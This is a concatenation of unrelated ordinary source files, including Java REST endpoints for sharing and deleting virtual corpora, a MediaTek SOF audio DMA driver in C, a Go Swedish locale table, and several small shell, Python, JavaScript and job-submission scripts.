* types. If createdBy is not specified, retrieves virtual corpora
* of all users.
*
* @param securityContext
* @param createdBy
* username of virtual corpus creator (optional)
* @param type
* {@link ResourceType}
* @return a list of virtual corpora
*/
@GET
@Path("list/system-admin")
@Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
public List<QueryDto> listVCByType (
@Context SecurityContext securityContext,
@QueryParam("createdBy") String createdBy,
@QueryParam("type") ResourceType type) {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.ADMIN);
return service.listQueryByType(context.getUsername(), createdBy, type,
QueryType.VIRTUAL_CORPUS);
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
}
/**
* Only the VC owner and system admins can delete VC. VCA admins
* can delete VC-accesses e.g. of project VC, but not the VC
* themselves.
*
* @param securityContext
* @param createdBy
* vc creator
* @param vcName
* vc name
* @return HTTP status 200, if successful
*/
@DELETE
@Path("~{createdBy}/{vcName}")
public Response deleteVCByName (@Context SecurityContext securityContext,
@PathParam("createdBy") String createdBy,
@PathParam("vcName") String vcName) {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.DELETE_VC);
service.deleteQueryByName(context.getUsername(), vcName, createdBy,
QueryType.VIRTUAL_CORPUS);
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
return Response.ok().build();
}
/**
* VC can only be shared with a group, not individuals.
* Only VCA admins are allowed to share VC and the VC must have
* been created by themselves.
*
* <br /><br />
* Not allowed via third-party apps.
*
* @param securityContext
* @param vcCreator
* the username of the vc creator
* @param vcName
* the name of the vc
* @param groupName
* the name of the group to share
* @return HTTP status 200, if successful
*/
@POST
@Path("~{vcCreator}/{vcName}/share/@{groupName}")
public Response shareVC (@Context SecurityContext securityContext,
@PathParam("vcCreator") String vcCreator,
@PathParam("vcName") String vcName,
@PathParam("groupName") String groupName) {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.SHARE_VC);
service.shareQuery(context.getUsername(), vcCreator, vcName, groupName);
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
return Response.ok("SUCCESS").build();
}
/**
* Only VCA Admins and system admins are allowed to delete a
* VC-access.
*
* <br /><br />
* Not allowed via third-party apps.
*
* @param securityContext
* @param accessId
* @return
*/
@DELETE
@Path("access/{accessId}")
public Response deleteVCAccessById (
@Context SecurityContext securityContext,
@PathParam("accessId") int accessId) {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.DELETE_VC_ACCESS);
service.deleteQueryAccess(accessId, context.getUsername());
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
return Response.ok().build();
}
/**
* Lists active VC-accesses available to user.
*
* Only available to VCA and system admins.
* For system admins, list all VCA regardless of status.
*
* @param securityContext
* @return a list of VC accesses
*/
@GET
@Path("access")
@Produces(MediaType.APPLICATION_JSON + ";charset=utf-8")
public List<QueryAccessDto> listVCAccesses (
@Context SecurityContext securityContext,
@QueryParam("groupName") String groupName) {
TokenContext context =
(TokenContext) securityContext.getUserPrincipal();
try {
scopeService.verifyScope(context, OAuth2Scope.VC_ACCESS_INFO);
if (groupName!=null && !groupName.isEmpty()){
return service.listQueryAccessByGroup(context.getUsername(), groupName);
}
else {
return service.listQueryAccessByUsername(context.getUsername());
}
}
catch (KustvaktException e) {
throw kustvaktResponseHandler.throwit(e);
}
}
}
|
#!/bin/sh
fileName=$1
#Create a temporary directory that stores the library files
SCRATCH=$(mktemp -dp /tmp)
tar -xzf "$fileName" -C "$SCRATCH"
#Stores the current directory
here=$(pwd)
cd "$SCRATCH" || exit
name=$(ls)
cd "$name" || exit
#search the current directory for files containing
#"DELETE ME"and remove each file found
grep -lF "DELETE ME" file_* | xargs rm
cd .. || exit
#Creates the cleaned archive using $here to
#go to the proper path
tar -czf "$here"/cleaned_"$name".tgz "$name"
|
package com.agido.idea.settings.plugins.maven;
import com.google.common.base.Joiner;
import com.google.common.base.Splitter;
import com.google.common.collect.Sets;
import com.intellij.openapi.util.Pair;
import org.jetbrains.annotations.NotNull;
import java.util.Set;
import java.util.TreeSet;
public class MavenProfiles extends Pair.NonNull<TreeSet<String>, TreeSet<String>> {
private MavenProfiles(@NotNull TreeSet<String> first, @NotNull TreeSet<String> second) {
super(first, second);
}
public Set<String> getEnabledProfiles() {
return first;
}
public Set<String> getDisabledProfiles() {
return second;
}
@Override
public String toString() {
String enabled = Joiner.on(',').join(getEnabledProfiles());
String disabled = Joiner.on(",-").join(getDisabledProfiles());
if (enabled.isEmpty() && disabled.isEmpty()) {
return "";
} else if (enabled.isEmpty()) {
return "-" + disabled;
} else if (disabled.isEmpty()) {
return enabled;
}
return Joiner.on(",-").join(enabled, disabled);
}
public static MavenProfiles of(String profiles) {
TreeSet<String> enabled = Sets.newTreeSet();
TreeSet<String> disabled = Sets.newTreeSet();
for (String profile : Sets.newTreeSet(Splitter.on(",").split(profiles))) {
profile = profile.trim();
if (profile.isEmpty()) {
continue;
}
if (profile.startsWith("-")) {
disabled.add(profile.substring(1));
} else {
enabled.add(profile);
}
}
return of(enabled, disabled);
}
public static MavenProfiles of(TreeSet<String> enabled, TreeSet<String> disabled) {
return new MavenProfiles(enabled, disabled);
}
}
|
<filename>src/drivers/mediatek/mt8195/afe-memif.c
// SPDX-License-Identifier: BSD-3-Clause
//
// Copyright(c) 2021 Mediatek
//
// Author: <NAME> <<EMAIL>>
// <NAME> <<EMAIL>>
#include <sof/common.h>
#include <sof/audio/component.h>
#include <sof/drivers/afe-drv.h>
#include <sof/drivers/afe-dai.h>
#include <sof/drivers/afe-memif.h>
#include <sof/drivers/timer.h>
#include <sof/lib/alloc.h>
#include <sof/lib/dma.h>
#include <sof/lib/io.h>
#include <sof/lib/notifier.h>
#include <sof/lib/uuid.h>
#include <sof/math/numbers.h>
#include <sof/platform.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
/* df5e94d7-fd93-42e9-bb94-ab40becc7151 */
DECLARE_SOF_UUID("memif", memif_uuid, 0xdf5e94d7, 0xfd93, 0x42e9,
0xbb, 0x94, 0xab, 0x40, 0xbe, 0xcc, 0x71, 0x51);
DECLARE_TR_CTX(memif_tr, SOF_UUID(memif_uuid), LOG_LEVEL_INFO);
/*
* Note: TEST_SGEN for test only
* Define this TEST_SGEN to enable sine tone generator
* then output data to audio memory interface(memif),
* you can set TEST_SGEN_ID to choose output to which memif.
* e.g. set TEST_SGEN as '1' and TEST_SGEN_ID as "MT8195_MEMIF_DL2",
* the data source of DL2 will from sine generator.
*/
#define TEST_SGEN (0)
#if TEST_SGEN
#include <mt8195-afe-regs.h>
#include <mt8195-afe-common.h>
#define TEST_SGEN_ID MT8195_MEMIF_DL2
#define AUDIO_TML_PD_MASK 1
#define AUDIO_TML_PD_SHIFT 27
#define AFE_SGEN_FREQ_DIV_CH1_MASK 0x1f
#define AFE_SGEN_FREQ_DIV_CH1_SHIFT 0
#define AFE_SGEN_FREQ_DIV_CH2_MASK 0x1f
#define AFE_SGEN_FREQ_DIV_CH2_SHIFT 12
#define AFE_SGEN_AMP_DIV_CH1_MASK 0x7
#define AFE_SGEN_AMP_DIV_CH1_SHIFT 5
#define AFE_SGEN_AMP_DIV_CH2_MASK 0x7
#define AFE_SGEN_AMP_DIV_CH2_SHIFT 17
#define AFE_SGEN_MUTE_CH1_MASK 0x1
#define AFE_SGEN_MUTE_CH1_SHIFT 24
#define AFE_SGEN_MUTE_CH2_MASK 0x1
#define AFE_SGEN_MUTE_CH2_SHIFT 25
#define AFE_SGEN_ENABLE_MASK 0x1
#define AFE_SGEN_ENABLE_SHIFT 26
#define AFE_SINEGEN_CON1_TIMING_CH1_MASK 0x1f
#define AFE_SINEGEN_CON1_TIMING_CH1_SHIFT 16
#define AFE_SINEGEN_CON1_TIMING_CH2_MASK 0x1f
#define AFE_SINEGEN_CON1_TIMING_CH2_SHIFT 21
#define AFE_SINEGEN_LB_MODE_MSK 0xff
#define AFE_SINEGEN_LB_MODE_SHIFT 24
enum {
MT8195_SGEN_UL5 = 0x18,
MT8195_SGEN_UL4 = 0x1f,
MT8195_SGEN_DL3 = 0x47,
MT8195_SGEN_DL2 = 0x60,
};
/*sgen freq div*/
enum {
SGEN_FREQ_64D1 = 1,
SGEN_FREQ_64D2 = 2,
SGEN_FREQ_64D3 = 3,
SGEN_FREQ_64D4 = 4,
SGEN_FREQ_64D5 = 5,
SGEN_FREQ_64D6 = 6,
SGEN_FREQ_64D7 = 7,
SGEN_FREQ_64D8 = 8,
};
/*sgen amp div*/
enum {
SGEN_AMP_D1 = 0,
SGEN_AMP_D2 = 1,
SGEN_AMP_D4 = 2,
SGEN_AMP_D8 = 3,
SGEN_AMP_D16 = 4,
SGEN_AMP_D32 = 5,
SGEN_AMP_D64 = 6,
SGEN_AMP_D128 = 7,
};
enum {
SGEN_CH_TIMING_8K = 0,
SGEN_CH_TIMING_12K = 1,
SGEN_CH_TIMING_16K = 2,
SGEN_CH_TIMING_24K = 3,
SGEN_CH_TIMING_32K = 4,
SGEN_CH_TIMING_48K = 5,
SGEN_CH_TIMING_96K = 6,
SGEN_CH_TIMING_192K = 7,
SGEN_CH_TIMING_384K = 8,
SGEN_CH_TIMING_7P35K = 16,
SGEN_CH_TIMING_11P025K = 17,
SGEN_CH_TIMING_14P7K = 18,
SGEN_CH_TIMING_22P05K = 19,
SGEN_CH_TIMING_29P4K = 20,
SGEN_CH_TIMING_44P1K = 21,
SGEN_CH_TIMING_88P2K = 22,
SGEN_CH_TIMING_176P4K = 23,
SGEN_CH_TIMING_352P8K = 24,
};
#endif
struct afe_memif_dma {
int direction; /* 1 downlink, 0 uplink */
int memif_id;
int dai_id;
int irq_id;
struct mtk_base_afe *afe;
uint32_t dma_base;
uint32_t dma_size;
uint32_t rptr;
uint32_t wptr;
uint32_t period_size;
unsigned int channel;
unsigned int rate;
unsigned int format;
};
/* acquire the specific DMA channel */
static struct dma_chan_data *memif_channel_get(struct dma *dma, unsigned int req_chan)
{
uint32_t flags;
struct dma_chan_data *channel;
tr_dbg(&memif_tr, "MEMIF: channel_get(%d)", req_chan);
spin_lock_irq(&dma->lock, flags);
if (req_chan >= dma->plat_data.channels) {
spin_unlock_irq(&dma->lock, flags);
tr_err(&memif_tr, "MEMIF: Channel %d out of range", req_chan);
return NULL;
}
channel = &dma->chan[req_chan];
if (channel->status != COMP_STATE_INIT) {
spin_unlock_irq(&dma->lock, flags);
tr_err(&memif_tr, "MEMIF: Cannot reuse channel %d", req_chan);
return NULL;
}
atomic_add(&dma->num_channels_busy, 1);
channel->status = COMP_STATE_READY;
spin_unlock_irq(&dma->lock, flags);
return channel;
}
/* channel must not be running when this is called */
static void memif_channel_put(struct dma_chan_data *channel)
{
uint32_t flags;
/* Assuming channel is stopped, we thus don't need hardware to
* do anything right now
*/
tr_info(&memif_tr, "MEMIF: channel_put(%d)", channel->index);
notifier_unregister_all(NULL, channel);
spin_lock_irq(&channel->dma->lock, flags);
channel->status = COMP_STATE_INIT;
atomic_sub(&channel->dma->num_channels_busy, 1);
spin_unlock_irq(&channel->dma->lock, flags);
}
#if TEST_SGEN
static uint32_t mt8195_sinegen_timing(uint32_t rate)
{
uint32_t sinegen_timing;
switch (rate) {
case 8000:
sinegen_timing = SGEN_CH_TIMING_8K;
break;
case 12000:
sinegen_timing = SGEN_CH_TIMING_12K;
break;
case 16000:
sinegen_timing = SGEN_CH_TIMING_16K;
break;
case 24000:
sinegen_timing = SGEN_CH_TIMING_24K;
break;
case 32000:
sinegen_timing = SGEN_CH_TIMING_32K;
break;
case 48000:
sinegen_timing = SGEN_CH_TIMING_48K;
break;
case 96000:
sinegen_timing = SGEN_CH_TIMING_96K;
break;
case 192000:
sinegen_timing = SGEN_CH_TIMING_192K;
break;
case 384000:
sinegen_timing = SGEN_CH_TIMING_384K;
break;
case 7350:
sinegen_timing = SGEN_CH_TIMING_7P35K;
break;
case 11025:
sinegen_timing = SGEN_CH_TIMING_11P025K;
break;
case 14700:
sinegen_timing = SGEN_CH_TIMING_14P7K;
break;
case 22050:
sinegen_timing = SGEN_CH_TIMING_22P05K;
break;
case 29400:
sinegen_timing = SGEN_CH_TIMING_29P4K;
break;
case 44100:
sinegen_timing = SGEN_CH_TIMING_44P1K;
break;
case 88200:
sinegen_timing = SGEN_CH_TIMING_88P2K;
break;
case 176400:
sinegen_timing = SGEN_CH_TIMING_176P4K;
break;
case 352800:
sinegen_timing = SGEN_CH_TIMING_352P8K;
break;
default:
sinegen_timing = SGEN_CH_TIMING_48K;
tr_err(&memif_tr, "invalid rate %d, set default 48k ", rate);
}
tr_dbg(&memif_tr, "rate %d, sinegen_timing %d ", rate, sinegen_timing);
return sinegen_timing;
}
static void mtk_afe_reg_update_bits(uint32_t addr_offset, uint32_t mask, uint32_t val, int shift)
{
io_reg_update_bits(AFE_BASE_ADDR + addr_offset, mask << shift, val << shift);
}
static uint32_t mtk_afe_reg_read(uint32_t addr_offset)
{
return io_reg_read(AFE_BASE_ADDR + addr_offset);
}
static void mt8195_afe_sinegen_enable(uint32_t sgen_id, uint32_t rate, int enable)
{
uint32_t loopback_mode, reg_1, reg_2, sinegen_timing;
tr_dbg(&memif_tr, "sgen_id %d, enable %d", sgen_id, enable);
sinegen_timing = mt8195_sinegen_timing(rate);
if (enable == 1) {
/* set loopback mode */
switch (sgen_id) {
case MT8195_MEMIF_UL4:
loopback_mode = MT8195_SGEN_UL4;
break;
case MT8195_MEMIF_UL5:
loopback_mode = MT8195_SGEN_UL5;
break;
case MT8195_MEMIF_DL2:
loopback_mode = MT8195_SGEN_DL2;
break;
case MT8195_MEMIF_DL3:
loopback_mode = MT8195_SGEN_DL3;
break;
default:
tr_err(&memif_tr, "invalid sgen_id %d", sgen_id);
return;
}
/* enable sinegen clock*/
mtk_afe_reg_update_bits(AUDIO_TOP_CON0, AUDIO_TML_PD_MASK, 0, AUDIO_TML_PD_SHIFT);
/*loopback source*/
mtk_afe_reg_update_bits(AFE_SINEGEN_CON2, AFE_SINEGEN_LB_MODE_MSK, loopback_mode,
AFE_SINEGEN_LB_MODE_SHIFT);
/* sine gen timing*/
mtk_afe_reg_update_bits(AFE_SINEGEN_CON1, AFE_SINEGEN_CON1_TIMING_CH1_MASK,
sinegen_timing, AFE_SINEGEN_CON1_TIMING_CH1_SHIFT);
mtk_afe_reg_update_bits(AFE_SINEGEN_CON1, AFE_SINEGEN_CON1_TIMING_CH2_MASK,
sinegen_timing, AFE_SINEGEN_CON1_TIMING_CH2_SHIFT);
/*freq div*/
mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_FREQ_DIV_CH1_MASK,
SGEN_FREQ_64D1, AFE_SGEN_FREQ_DIV_CH1_SHIFT);
mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_FREQ_DIV_CH2_MASK,
SGEN_FREQ_64D2, AFE_SGEN_FREQ_DIV_CH2_SHIFT);
/*amp div*/
mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_AMP_DIV_CH1_MASK, SGEN_AMP_D2,
AFE_SGEN_AMP_DIV_CH1_SHIFT);
mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_AMP_DIV_CH2_MASK, SGEN_AMP_D2,
AFE_SGEN_AMP_DIV_CH2_SHIFT);
/* enable sgen*/
mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_ENABLE_MASK, 1,
AFE_SGEN_ENABLE_SHIFT);
} else {
/* disable sgen*/
mtk_afe_reg_update_bits(AFE_SINEGEN_CON0, AFE_SGEN_ENABLE_MASK, 0,
AFE_SGEN_ENABLE_SHIFT);
/* disable sgen clock */
mtk_afe_reg_update_bits(AUDIO_TOP_CON0, AUDIO_TML_PD_MASK, 1, AUDIO_TML_PD_SHIFT);
}
reg_1 = mtk_afe_reg_read(AFE_SINEGEN_CON0);
reg_2 = mtk_afe_reg_read(AFE_SINEGEN_CON2);
tr_dbg(&memif_tr, "AFE_SINEGEN_CON0 0x%x, AFE_SINEGEN_CON2 0x%x", reg_1, reg_2);
}
#endif
static int memif_start(struct dma_chan_data *channel)
{
struct afe_memif_dma *memif = dma_chan_get_data(channel);
tr_info(&memif_tr, "MEMIF:%d start(%d), channel_status:%d", memif->memif_id, channel->index,
channel->status);
if (channel->status != COMP_STATE_PREPARE && channel->status != COMP_STATE_SUSPEND)
return -EINVAL;
channel->status = COMP_STATE_ACTIVE;
#if TEST_SGEN
mt8195_afe_sinegen_enable(TEST_SGEN_ID, 48000, 1);
#endif
/* Do the HW start of the DMA */
afe_memif_set_enable(memif->afe, memif->memif_id, 1);
return 0;
}
static int memif_release(struct dma_chan_data *channel)
{
struct afe_memif_dma *memif = dma_chan_get_data(channel);
/* TODO actually handle pause/release properly? */
tr_info(&memif_tr, "MEMIF: release(%d)", channel->index);
if (channel->status != COMP_STATE_PAUSED)
return -EINVAL;
channel->status = COMP_STATE_ACTIVE;
afe_memif_set_enable(memif->afe, memif->memif_id, 0);
#if TEST_SGEN
mt8195_afe_sinegen_enable(TEST_SGEN_ID, 48000, 0);
#endif
return 0;
}
static int memif_pause(struct dma_chan_data *channel)
{
struct afe_memif_dma *memif = dma_chan_get_data(channel);
/* TODO actually handle pause/release properly? */
tr_info(&memif_tr, "MEMIF: pause(%d)", channel->index);
if (channel->status != COMP_STATE_ACTIVE)
return -EINVAL;
channel->status = COMP_STATE_PAUSED;
/* Disable HW requests */
afe_memif_set_enable(memif->afe, memif->memif_id, 0);
return 0;
}
static int memif_stop(struct dma_chan_data *channel)
{
struct afe_memif_dma *memif = dma_chan_get_data(channel);
tr_info(&memif_tr, "MEMIF: stop(%d)", channel->index);
/* Validate state */
/* TODO: Should we? */
switch (channel->status) {
case COMP_STATE_READY:
case COMP_STATE_PREPARE:
return 0; /* do not try to stop multiple times */
case COMP_STATE_PAUSED:
case COMP_STATE_ACTIVE:
break;
default:
return -EINVAL;
}
channel->status = COMP_STATE_READY;
/* Disable channel */
afe_memif_set_enable(memif->afe, memif->memif_id, 0);
return 0;
}
static int memif_copy(struct dma_chan_data *channel, int bytes, uint32_t flags)
{
struct afe_memif_dma *memif = dma_chan_get_data(channel);
struct dma_cb_data next = {
.channel = channel,
.elem.size = bytes,
};
/* TODO XRUN check, update hw ptr */
/* TODO TBD Playback first data check */
/* update user hwptr */
if (memif->direction)
memif->wptr = (memif->wptr + bytes) % memif->dma_size;
else
memif->rptr = (memif->rptr + bytes) % memif->dma_size;
tr_dbg(&memif_tr, "memif_copy: wptr:%u, rptr:%u", memif->wptr, memif->rptr);
notifier_event(channel, NOTIFIER_ID_DMA_COPY, NOTIFIER_TARGET_CORE_LOCAL, &next,
sizeof(next));
return 0;
}
static int memif_status(struct dma_chan_data *channel, struct dma_chan_status *status,
uint8_t direction)
{
struct afe_memif_dma *memif = dma_chan_get_data(channel);
unsigned int hw_ptr;
status->state = channel->status;
status->flags = 0;
/* update current hw point */
hw_ptr = afe_memif_get_cur_position(memif->afe, memif->memif_id);
hw_ptr -= memif->dma_base;
if (memif->direction)
memif->rptr = hw_ptr;
else
memif->wptr = hw_ptr;
status->r_pos = memif->rptr + memif->dma_base;
status->w_pos = memif->wptr + memif->dma_base;
status->timestamp = timer_get_system(timer_get());
return 0;
}
/* set the DMA channel configuration, source/target address, buffer sizes */
static int memif_set_config(struct dma_chan_data *channel, struct dma_sg_config *config)
{
struct afe_memif_dma *memif = dma_chan_get_data(channel);
int dai_id;
int irq_id;
unsigned int dma_addr;
int dma_size = 0;
int direction;
int i;
channel->is_scheduling_source = config->is_scheduling_source;
channel->direction = config->direction;
direction = afe_memif_get_direction(memif->afe, memif->memif_id);
tr_info(&memif_tr, "memif_set_config, direction:%d, afe_dir:%d", config->direction,
direction);
switch (config->direction) {
case DMA_DIR_MEM_TO_DEV:
if (direction != MEM_DIR_PLAYBACK)
return -EINVAL;
dai_id = (int)AFE_HS_GET_DAI(config->dest_dev);
irq_id = (int)AFE_HS_GET_IRQ(config->dest_dev);
dma_addr = (int)config->elem_array.elems[0].src;
break;
case DMA_DIR_DEV_TO_MEM:
if (direction != MEM_DIR_CAPTURE)
return -EINVAL;
dai_id = (int)AFE_HS_GET_DAI(config->src_dev);
irq_id = (int)AFE_HS_GET_IRQ(config->src_dev);
dma_addr = (int)config->elem_array.elems[0].dest;
tr_dbg(&memif_tr, "capture: dai_id:%d, dma_addr:%u\n", dai_id, dma_addr);
break;
default:
tr_err(&memif_tr, "afe_memif_set_config() unsupported config direction");
return -EINVAL;
}
for (i = 0; i < config->elem_array.count; i++)
dma_size += (int)config->elem_array.elems[i].size;
if (!config->cyclic) {
tr_err(&memif_tr, "afe-memif: Only cyclic configurations are supported!");
return -EINVAL;
}
if (config->scatter) {
tr_err(&memif_tr, "afe-memif: scatter enabled, that is not supported for now!");
return -EINVAL;
}
memif->dai_id = dai_id;
memif->irq_id = irq_id;
memif->dma_base = dma_addr;
memif->dma_size = dma_size;
memif->direction = direction;
/* TODO risk, it may has sync problems with DAI comp */
memif->rptr = 0;
memif->wptr = 0;
memif->period_size = config->elem_array.elems[0].size;
/* get dai's config setting from afe driver */
afe_dai_get_config(memif->afe, dai_id, &memif->channel, &memif->rate, &memif->format);
/* set the afe memif parameters */
afe_memif_set_params(memif->afe, memif->memif_id, memif->channel, memif->rate,
memif->format);
afe_memif_set_addr(memif->afe, memif->memif_id, memif->dma_base, memif->dma_size);
channel->status = COMP_STATE_PREPARE;
return 0;
}
static int memif_probe(struct dma *dma)
{
int channel;
int ret;
struct mtk_base_afe *afe = afe_get();
struct afe_memif_dma *memif;
if (!dma || dma->chan) {
tr_err(&memif_tr, "MEMIF: Repeated probe");
return -EEXIST;
}
/* do afe driver probe */
ret = afe_probe(afe);
if (ret < 0) {
tr_err(&memif_tr, "MEMIF: afe_probe fail:%d", ret);
return ret;
}
dma->chan = rzalloc(SOF_MEM_ZONE_RUNTIME, 0, SOF_MEM_CAPS_RAM,
dma->plat_data.channels * sizeof(struct dma_chan_data));
if (!dma->chan) {
tr_err(&memif_tr, "MEMIF: Probe failure, unable to allocate channel descriptors");
return -ENOMEM;
}
for (channel = 0; channel < dma->plat_data.channels; channel++) {
dma->chan[channel].dma = dma;
/* TODO need divide to UL and DL for different index */
dma->chan[channel].index = channel;
memif = rzalloc(SOF_MEM_ZONE_SYS_RUNTIME, 0, SOF_MEM_CAPS_RAM,
sizeof(struct afe_memif_dma));
if (!memif) {
tr_err(&memif_tr, "afe-memif: %d channel %d private data alloc failed",
dma->plat_data.id, channel);
goto out;
}
memif->afe = afe;
memif->memif_id = channel;
dma_chan_set_data(&dma->chan[channel], memif);
}
return 0;
out:
if (dma->chan) {
for (channel = 0; channel < dma->plat_data.channels; channel++)
rfree(dma_chan_get_data(&dma->chan[channel]));
rfree(dma->chan);
dma->chan = NULL;
}
afe_remove(afe);
return -ENOMEM;
}
static int memif_remove(struct dma *dma)
{
int channel;
struct mtk_base_afe *afe = afe_get();
if (!dma->chan) {
tr_err(&memif_tr, "MEMIF: remove called without probe, it's a no-op");
return 0;
}
for (channel = 0; channel < dma->plat_data.channels; channel++) {
/* TODO Disable HW requests for this channel */
rfree(dma_chan_get_data(&dma->chan[channel]));
}
rfree(dma->chan);
dma->chan = NULL;
afe_remove(afe);
return 0;
}
static int memif_interrupt(struct dma_chan_data *channel, enum dma_irq_cmd cmd)
{
struct mtk_base_afe *afe = afe_get();
struct afe_memif_dma *memif = dma_chan_get_data(channel);
unsigned int sample_size =
((memif->format == SOF_IPC_FRAME_S16_LE) ? 2 : 4) * memif->channel;
unsigned int period = memif->period_size / sample_size;
if (channel->status == COMP_STATE_INIT)
return 0;
switch (cmd) {
case DMA_IRQ_STATUS_GET:
return afe_irq_get_status(afe, memif->irq_id);
case DMA_IRQ_CLEAR:
afe_irq_clear(afe, memif->irq_id);
return 0;
case DMA_IRQ_MASK:
afe_irq_disable(afe, memif->irq_id);
case DMA_IRQ_UNMASK:
afe_irq_config(afe, memif->irq_id, memif->rate, period);
afe_irq_enable(afe, memif->irq_id);
return 0;
default:
return -EINVAL;
}
return 0;
}
/* TODO need convert number to platform MACRO */
static int memif_get_attribute(struct dma *dma, uint32_t type, uint32_t *value)
{
switch (type) {
case DMA_ATTR_BUFFER_ALIGNMENT:
case DMA_ATTR_COPY_ALIGNMENT:
*value = 4;
break;
case DMA_ATTR_BUFFER_ADDRESS_ALIGNMENT:
*value = 16;
break;
case DMA_ATTR_BUFFER_PERIOD_COUNT:
*value = 4;
break;
default:
return -ENOENT;
}
return 0;
}
static int memif_get_data_size(struct dma_chan_data *channel, uint32_t *avail, uint32_t *free)
{
struct afe_memif_dma *memif = dma_chan_get_data(channel);
uint32_t hw_ptr;
/* update hw pointer from afe memif */
hw_ptr = afe_memif_get_cur_position(memif->afe, memif->memif_id);
tr_dbg(&memif_tr, "get_pos:0x%x, base:0x%x, dir:%d", hw_ptr, memif->dma_base,
memif->direction);
tr_dbg(&memif_tr, "dma_size:%u, period_size:%d", memif->dma_size, memif->period_size);
hw_ptr -= memif->dma_base;
if (memif->direction)
memif->rptr = hw_ptr;
else
memif->wptr = hw_ptr;
*avail = (memif->wptr + memif->dma_size - memif->rptr) % memif->dma_size;
/* TODO, check if need alignment the available and free size to 1 period */
if (memif->direction)
*avail = DIV_ROUND_UP(*avail, memif->period_size) * memif->period_size;
else
*avail = *avail / memif->period_size * memif->period_size;
*free = memif->dma_size - *avail;
tr_dbg(&memif_tr, "r:0x%x, w:0x%x, avail:%u, free:%u ", memif->wptr, *avail, *free);
return 0;
}
const struct dma_ops memif_ops = {
.channel_get = memif_channel_get,
.channel_put = memif_channel_put,
.start = memif_start,
.stop = memif_stop,
.pause = memif_pause,
.release = memif_release,
.copy = memif_copy,
.status = memif_status,
.set_config = memif_set_config,
.probe = memif_probe,
.remove = memif_remove,
.interrupt = memif_interrupt,
.get_attribute = memif_get_attribute,
.get_data_size = memif_get_data_size,
};
|
import request from '@/utils/request'
export function createDeviceAbility(data) {
return request({
url: '/temp/api/deviceAbility/createDeviceAbility',
method: 'post',
data
})
}
export function deleteAbility(id) {
return request({
url: `/temp/api/deviceAbility/deleteAbility/${id}`,
method: 'delete'
})
}
export function fetchList(data) {
return request({
url: '/temp/api/deviceAbility/select',
method: 'post',
data
})
}
export function updateDeviceAbility(data) {
return request({
url: '/temp/api/deviceAbility/updateDeviceAbility',
method: 'put',
data
})
}
// 设备功能管理总数
export function selectCount(data) {
return request({
url: `/temp/api/deviceAbility/select/${data}`,
method: 'post'
})
} |
#!/bin/sh
cd `dirname $0`
exec erl -sname edc -config $PWD/sys.config \
-pa $PWD/_build/default/lib/*/ebin $PWD/test -boot start_sasl \
-setcookie start-dev -run c erlangrc . |
def solve_csp(constraints, individuals):
roles = {c['role_id']: [] for c in constraints}
for individual in individuals:
for role_id in roles:
if all(constraint['condition'](individual) for constraint in constraints if constraint['role_id'] == role_id):
roles[role_id].append(individual['id'])
return roles |
<reponame>getevo/monday<filename>format_sv_se.go
package monday
// ============================================================
// Format rules for "sv_SE" locale: Swedish (Sweden)
// ============================================================
var longDayNamesSvSE = map[string]string{
"Sunday": "Söndag",
"Monday": "Måndag",
"Tuesday": "Tisdag",
"Wednesday": "Onsdag",
"Thursday": "Torsdag",
"Friday": "Fredag",
"Saturday": "Lördag",
}
var shortDayNamesSvSE = map[string]string{
"Sun": "Sön",
"Mon": "Mån",
"Tue": "Tis",
"Wed": "Ons",
"Thu": "Tors",
"Fri": "Fre",
"Sat": "Lör",
}
var longMonthNamesSvSE = map[string]string{
"January": "Januari",
"February": "Februari",
"March": "Mars",
"April": "April",
"May": "Maj",
"June": "Juni",
"July": "Juli",
"August": "Augusti",
"September": "September",
"October": "Oktober",
"November": "November",
"December": "December",
}
var shortMonthNamesSvSE = map[string]string{
"Jan": "jan",
"Feb": "feb",
"Mar": "mar",
"Apr": "apr",
"May": "maj",
"Jun": "jun",
"Jul": "jul",
"Aug": "aug",
"Sep": "sep",
"Oct": "okt",
"Nov": "nov",
"Dec": "dec",
}
|
echo "> Is Running?"
CURRENT_PID=$(pgrep -f lightcomics)
echo "$CURRENT_PID"
if [ -z $CURRENT_PID ]; then
echo "> Not Running!"
else
echo "> kill -2 $CURRENT_PID"
kill -9 $CURRENT_PID
sleep 1
echo "TURN OFF COMPLETE"
fi
echo "> Is Running?"
CURRENT_PID=$(pgrep -f lightcomics)
echo "$CURRENT_PID"
if [ -z $CURRENT_PID ]; then
echo "> Not Running!"
else
echo "> kill -2 $CURRENT_PID"
kill -9 $CURRENT_PID
sleep 1
echo "TURN OFF COMPLETE"
fi
|
<gh_stars>0
export * from "./lib/linkedin";
export * from "./lib/configure-auth"
|
#!/bin/bash
#SBATCH -J Act_maxtanh_1
#SBATCH --mail-user=eger@ukp.informatik.tu-darmstadt.de
#SBATCH --mail-type=FAIL
#SBATCH -e /work/scratch/se55gyhe/log/output.err.%j
#SBATCH -o /work/scratch/se55gyhe/log/output.out.%j
#SBATCH -n 1 # Number of cores
#SBATCH --mem-per-cpu=6000
#SBATCH -t 23:59:00 # Hours, minutes and seconds, or '#SBATCH -t 10' -only mins
#module load intel python/3.5
python3 /home/se55gyhe/Act_func/sequence_tagging/arg_min/PE-my.py maxtanh 128 Nadam 2 0.23687732426215133 0.001348231159606572 varscaling 0.3
|
#!/bin/bash
set -x
set -o errexit
set -o nounset
set -o pipefail
PROJECT_ROOT=$(cd $(dirname "$0")/.. ; pwd)
PATH="${PROJECT_ROOT}/dist:${PATH}"
VERSION="v1alpha1"
